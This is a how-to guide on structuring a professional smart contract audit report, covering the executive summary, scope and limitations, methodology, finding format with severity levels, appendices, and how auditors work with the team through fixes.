Development of Smart Contract Audit Report
Audit report is document that protocol team provides publicly before launch. Investors, users, and integrators read it to assess risks. Bad report is either empty formality or so technically overloaded no one understands real risks. Good report honestly describes what was found, what fixed, and what remains.
Important: auditor can't guarantee bugs don't exist. Auditor can say "I checked these specific properties with these specific methods and found no problems". Honest report describes this.
Professional report structure
Executive Summary
First section read by non-developers — investors, partners, lawyers. Here: overall conclusion (critical issues found? fixed?), scope (which contracts, commit hash, chains), methodology (manual review, fuzzing, formal verification?), summary table of findings by severity.
Summary table must be on first page:
| Severity | Found | Fixed | Acknowledged | Disputed |
|---|---|---|---|---|
| Critical | 2 | 2 | 0 | 0 |
| High | 4 | 3 | 1 | 0 |
| Medium | 7 | 6 | 1 | 0 |
| Low | 12 | 8 | 4 | 0 |
| Informational | 15 | 5 | 10 | 0 |
If critical issues remain unfixed or acknowledged — red flag for reader. Auditor can't force fixes — only document.
Scope and limitations
Precise scope mandatory. Without it, unclear what exactly was checked. Must include:
- Specific files and functions (not "entire protocol")
- Repository commit hash
- What wasn't in scope (oracles, admin keys, frontend)
- Timeline constraints and their impact on review depth
Professional auditor writes honestly: "Due to code volume and time constraints, fuzzing was only for core swap functions, lending module checked only manual review." Protects both auditor and helps reader understand confidence level.
Methodology
Explains how audit was conducted:
Manual code review — line-by-line reading focusing on known vulnerability classes: reentrancy, integer overflow/underflow, access control, front-running, oracle manipulation, flash loan vectors.
Automated analysis — Slither, Mythril, 4naly3er. Find obvious patterns, generate false positives. Results need manual validation.
Fuzzing — Foundry Invariant testing or Echidna. Define invariants (properties always true) and run test corpus with millions of random inputs.
Formal verification (if applied) — Certora Prover or K framework. Mathematically prove properties. Expensive, for critical components.
Finding description format
Each finding — separate section with standard structure:
Header with ID and severity. H-01: Reentrancy in withdraw() allows draining funds. ID for tracking, severity for prioritizing.
Severity classification:
- Critical — user fund loss, complete contract control by attacker
- High — partial fund loss, bypass critical logic
- Medium — invariant violation without direct fund loss, DoS
- Low — suboptimal behavior, potential vector in conditions
- Informational — code quality, gas inefficiency, best practice violations
Vulnerability description. What exactly is wrong and why. Specific function, code lines, exploitation mechanism.
Proof of Concept. For critical and high — mandatory. Foundry test demonstrating exploitation.
Remediation recommendation. Concrete — not "add check", but "add nonReentrant modifier from OpenZeppelin ReentrancyGuard and move state update before external call (Checks-Effects-Interactions pattern)".
Team response and status. After team responds — add status: Fixed (with commit hash), Acknowledged (team knows and accepts risk), Disputed (team disagrees).
Appendices
Appendix A: Test Coverage. Percent of lines/functions/branches covered by tests. forge coverage --report lcov. Low coverage (<70%) itself is risk.
Appendix B: Automated Tools Output. Raw Slither/Mythril output with notes which false positives and why.
Appendix C: Code Quality. Style, documentation (NatSpec), events for monitoring, upgrade pattern, admin key risks.
Work with team
Quality audit is dialogue, not monologue. After initial review, auditor sends findings to team, team fixes and explains disputed items. Auditor verifies fixes (separate review). Final report reflects final state.
Best practice: publish not only final report but changelog — what was found, what fixed. Shows team maturity.
Timeline: 1-3 weeks depending on code volume and review depth. Average DeFi protocol (5-10 contracts, 2000-5000 Solidity lines) — 2 weeks.







